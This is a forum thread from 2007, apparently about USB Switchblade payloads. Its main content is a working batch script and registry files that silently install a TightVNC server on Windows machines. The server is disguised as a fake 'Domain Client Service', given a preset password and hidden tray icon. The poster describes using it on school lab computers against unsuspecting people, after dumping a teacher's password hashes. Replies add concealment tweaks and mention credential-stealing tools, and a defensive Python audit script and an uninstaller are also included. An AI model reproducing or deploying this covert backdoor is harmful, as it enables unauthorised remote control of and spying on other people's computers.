kz26 Posted January 13, 2007

I found that the VNC entry on the Switchblade wiki was too cumbersome to follow. I did some research and was able to create a silent install package for the TightVNC server (see www.tightvnc.com). The beauty of this VNC variant is that the server requires only 2 files, an EXE and its DLL.

To create this payload:

1. Go to the TightVNC homepage above.
2. Download the no-install zip package.
3. In your switchblade\tools directory, create the folder "tvnc".
4. Copy "winvnc.exe" and "VNCHooks.dll" to the "tvnc" directory.
5. Create "vnc.cmd" in your tools directory with the following code:

[code]
@echo off
REM Silent Install of TightVNC server
REM Install script by kz26

REM Part 1 - Copy server files
xcopy tvnc\winvnc.exe %systemroot% /c /y
xcopy tvnc\VNCHooks.dll %systemroot% /c /y

REM install phony WinVNC service and import reg settings
sc create winvnc binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service"
sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable."
regedit.exe /s tvnc\reg1.reg
regedit.exe /s tvnc\reg2.reg

REM Start the VNC Service and have fun
net start winvnc
[/code]

6. Create reg1.reg and reg2.reg in your "tvnc" directory.

Contents of reg1.reg:

[code]
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\ORL]
[HKEY_CURRENT_USER\Software\ORL\VNCHooks]
[HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs]
[HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\winvnc.exe]
"use_GetUpdateRect"=dword:00000001
"use_Timer"=dword:00000000
"use_KeyPress"=dword:00000001
"use_LButtonUp"=dword:00000001
"use_MButtonUp"=dword:00000001
"use_RButtonUp"=dword:00000001
"use_Deferral"=dword:00000001
[/code]

Contents of reg2.reg:

[code]
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL]
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"ConnectPriority"=dword:00000000
"DebugMode"=dword:00000000
"DebugLevel"=dword:00000002
"LoopbackOnly"=dword:00000000
"EnableHTTPDaemon"=dword:00000000
"EnableURLParams"=dword:00000000
"AllowLoopback"=dword:00000001
"AuthRequired"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000001e
"QueryAccept"=dword:00000000
"QueryAllowNoPass"=dword:00000000
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000000
"PortNumber"=dword:00001f90
"HTTPPortNumber"=dword:000016a8
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"LockSetting"=dword:00000000
"RemoveWallpaper"=dword:00000001
"Password"=hex:77,96,ba,8c,c2,b3,68,07
"PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
[/code]

7. Add the following to your go.cmd file:

[code]
start /b .\vnc.cmd
[/code]

------------

This payload will silently install the WinVNC service and disguise it as a "realistic" system service.

To connect: use any VNC viewer to connect to the target.
Port: 8080
Username: N/A
Password: hacked

I believe this payload is much more streamlined. Obviously, it won't do the external IP email send as the wiki version advertises, but this method should be more than adequate for most people.

P.S. I use this to install VNC at my school's WinXP Pro computer lab. Works great for pissing off unsuspecting people...
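Added example, not part of kz26's post and not TightVNC code: a small Python audit that parses the Windows Registry Editor 5.00 text format used by reg1.reg/reg2.reg above and reports the WinVNC3 settings a defender would want to see at a glance (listen ports, whether authentication is required, whether the server is reachable from the network, whether the tray icon is hidden, whether a password blob is stored). The SAMPLE_REG text is constructed to mirror reg2.reg above plus the DisableTrayIcon value discussed later in the thread; it does not handle multi-line hex continuations.

```python
"""Audit a WinVNC3 .reg export of the kind posted in this thread."""

# Constructed sample: mirrors the reg2.reg values above plus DisableTrayIcon.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"LoopbackOnly"=dword:00000000
"AuthRequired"=dword:00000001
"DisableTrayIcon"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"AutoPortSelect"=dword:00000000
"PortNumber"=dword:00001f90
"HTTPPortNumber"=dword:000016a8
"Password"=hex:77,96,ba,8c,c2,b3,68,07
"""


def parse_reg(text):
    """Return {key_path: {value_name: value}}; dword -> int, hex -> bytes, else str."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]              # new key section
            keys.setdefault(current, {})
        elif current and line.startswith('"'):
            name, _, raw = line[1:].partition('"=')
            if raw.startswith("dword:"):
                keys[current][name] = int(raw[6:], 16)
            elif raw.startswith("hex:"):
                keys[current][name] = bytes(int(b, 16) for b in raw[4:].split(","))
            else:
                keys[current][name] = raw.strip('"')
    return keys


def audit_winvnc(text):
    """Summarise the settings that matter when triaging a WinVNC install."""
    reg = parse_reg(text)
    base = reg.get(r"HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3", {})
    default = reg.get(r"HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default", {})
    return {
        "vnc_port": default.get("PortNumber"),          # 0x1f90 -> 8080
        "http_port": default.get("HTTPPortNumber"),     # 0x16a8 -> 5800
        "auth_required": bool(base.get("AuthRequired", 0)),
        "remote_reachable": not base.get("LoopbackOnly", 0),
        "tray_icon_hidden": bool(base.get("DisableTrayIcon", 0)),
        "password_stored": len(default.get("Password", b"")) == 8,
    }


if __name__ == "__main__":
    print(audit_winvnc(SAMPLE_REG))
```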
Darren Kitchen Posted January 13, 2007

Kudos on the nice switchblade module!
Guest Twilight Zone Posted January 13, 2007

Good. Can you include a cleaning module, for when you don't need it anymore?
DLSS Posted January 13, 2007

You said you used it at school; however, don't you then have a limited account and no access to regedit? That's how it is at our school anyway...
kz26 Posted January 13, 2007

Yeah, the students at our school are supposed to have limited accounts. However, I pwdumped a teacher's comp when they weren't there to get the local admin password.
kz26 Posted January 13, 2007

Ok, this antidote is pretty simple - it does everything BUT delete the registry keys, but that shouldn't be a major issue.

[code]
@echo off
REM TightVNC Server Antidote

REM Turn off the service
sc stop winvnc

REM Delete the service
sc delete winvnc

REM Delete the server files
del %systemroot%\winvnc.exe
del %systemroot%\VNCHooks.dll
[/code]
jinster364 Posted October 1, 2007

Where do I type in the password and port? Whenever I try to connect to the host computer, it says it cannot connect.
Joerg Posted October 1, 2007

I recommend you try reverse VNC. Otherwise you have to hack every router to get VNC ;)
joker5893 Posted October 5, 2007

Hi, I'm getting an error when I run my go.cmd file: it says that the winvnc.exe and vnchooks.dll files cannot be found, even though they are in the same folder as the go.cmd file.
Deveant Posted October 6, 2007

> Hi, I'm getting an error when I run my go.cmd file: it says that the winvnc.exe and vnchooks.dll files cannot be found, even though they are in the same folder as the go.cmd file.

You need to put the winvnc.exe and vnchooks.dll files in a folder called "tvnc".
USBHacker Posted October 6, 2007

> You said you used it at school; however, don't you then have a limited account and no access to regedit? That's how it is at our school anyway...

Also, sometimes it is possible to get around that by using a 3rd party regedit. I use RegAlyser. It's a fun & easy way to re-enable the Run button in the Start menu, cmd and some other things! :D

USBHacker

PS: Can someone please put all the required files for this hack into a zip (or some other archive format), host it on some server (mediafire is a good one), and give me the link? Or save it as an attachment on this forum?

Thanks in advance,
USBHacker
HALEN666 Posted October 10, 2007

Even better, if you wanna hide the icon in the tray bar, just add this reg to the first reg file:

[code]
HKLM\SOFTWARE\ORL\WinVNC3\DisableTrayIcon DWORD "1"
[/code]
DLSS Posted October 11, 2007

> Also, sometimes it is possible to get around that by using a 3rd party regedit. I use RegAlyser. It's a fun & easy way to re-enable the Run button in the Start menu, cmd and some other things! :D
>
> PS: Can someone please put all the required files for this hack into a zip (or some other archive format), host it on some server (mediafire is a good one), and give me the link? Or save it as an attachment on this forum?

Is RegAlyser portable, or do you have a portable version?
USBHacker Posted October 15, 2007

^ http://www.mediafire.com/?fy0b3m1vdzz ;)

PS: Since I did this for you, can you please upload all this stuff for me? If not, that is also ok.
AndyzBong Posted October 25, 2007

Howdy all,

I always enjoy a new silent VNC server install via the USB Switchblade, but I can never get them to work. I downloaded VNCHooks.dll and winvnc.exe (TightVNC Win32 Server) from http://www.tightvnc.com/download (tightvnc-1.3.9_x86.zip) and placed both of these files in my WIPCMD\tvnc folder. (WIPCMD is my "payload folder" containing go.cmd and vnc.cmd.)

My vnc.cmd code looks like this:

[code]
@echo off
REM Silent Install of TightVNC server
REM Script by kz26

REM Copy VNC Server Files
xcopy tvnc\winvnc.exe %systemroot% /c /y
xcopy tvnc\VNCHooks.dll %systemroot% /c /y

REM Install fake WinVNC service and import reg settings
sc create winvnc binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service"
sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable."
regedit.exe /s tvnc\reg1.reg
regedit.exe /s tvnc\reg2.reg

REM Port: 8080
REM Username: N/A
REM Password: hacked
net start winvnc
:End
exit
[/code]

These are my reg1.reg and reg2.reg codes:

reg1.reg

[code]
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\DisableTrayIcon DWORD "1"]
[HKEY_CURRENT_USER\Software\ORL]
[HKEY_CURRENT_USER\Software\ORL\VNCHooks]
[HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs]
[HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\winvnc.exe]
"use_GetUpdateRect"=dword:00000001
"use_Timer"=dword:00000000
"use_KeyPress"=dword:00000001
"use_LButtonUp"=dword:00000001
"use_MButtonUp"=dword:00000001
"use_RButtonUp"=dword:00000001
"use_Deferral"=dword:00000001
[/code]

reg2.reg

[code]
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL]
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"ConnectPriority"=dword:00000000
"DebugMode"=dword:00000000
"DebugLevel"=dword:00000002
"LoopbackOnly"=dword:00000000
"EnableHTTPDaemon"=dword:00000000
"EnableURLParams"=dword:00000000
"AllowLoopback"=dword:00000001
"AuthRequired"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000001e
"QueryAccept"=dword:00000000
"QueryAllowNoPass"=dword:00000000
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000000
"PortNumber"=dword:00001f90
"HTTPPortNumber"=dword:000016a8
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"LockSetting"=dword:00000000
"RemoveWallpaper"=dword:00000001
"Password"=hex:77,96,ba,8c,c2,b3,68,07
"PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
[/code]

And finally, this is my go.cmd code that launches vnc.cmd:

[code]
@echo [START Silent WinVNC Server Install] >> Documents\logfiles\%computername%.log 2>&1
start /b .\vnc.cmd
@echo [End Silent WinVNC Server Install] >> Documents\logfiles\%computername%.log 2>&1
:End
exit
[/code]

This code is the last script to be autorun by my USB Switchblade; when it executes, the rest of my applications (FirePassword, netpass, iehv, etc.) all work fine.

Note: I added [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\DisableTrayIcon DWORD "1"] to the reg1.reg file due to HALEN666's comment about this registry key disabling the WinVNC server icon in the system tray; but can't the same thing be achieved by ResHacking winvnc.exe and replacing the WinVNC icon with a clear icon?

- AndyzBong
Joerg Posted October 25, 2007

Then you have a blank icon in the systray, more suspicious than an "invisible" icon (no icon).